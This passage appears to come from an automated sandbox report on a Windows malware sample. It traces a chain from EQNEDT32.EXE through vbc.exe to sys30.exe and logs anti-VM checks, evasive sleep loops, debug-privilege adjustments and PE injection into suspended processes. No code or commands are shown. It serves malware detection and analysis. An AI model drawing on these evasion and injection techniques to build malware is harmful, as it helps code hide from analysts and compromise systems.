Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2804	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2280	Thread sleep count: 193 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2540	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2688	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904	Thread sleep count: 8354 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904	Thread sleep count: 1010 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2816	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2572	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2120	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1408	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1312	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2668	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1016	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 3008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 832	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 604	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2792	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1304	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1452	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2224	Thread sleep time: -60000s >= -30000s

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 8354	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 1010	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 7559
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: threadDelayed 1957
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Window / User API: foregroundWindowGot 386

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477

Source: sys30.exe, 00000007.00000002.698161367.0000000006149000.00000004.00000001.sdmp	Binary or memory string: VMware_S
Source: sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Memory written: C:\Users\user\AppData\Local\sys4h57g\sys30.exe base: 70000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
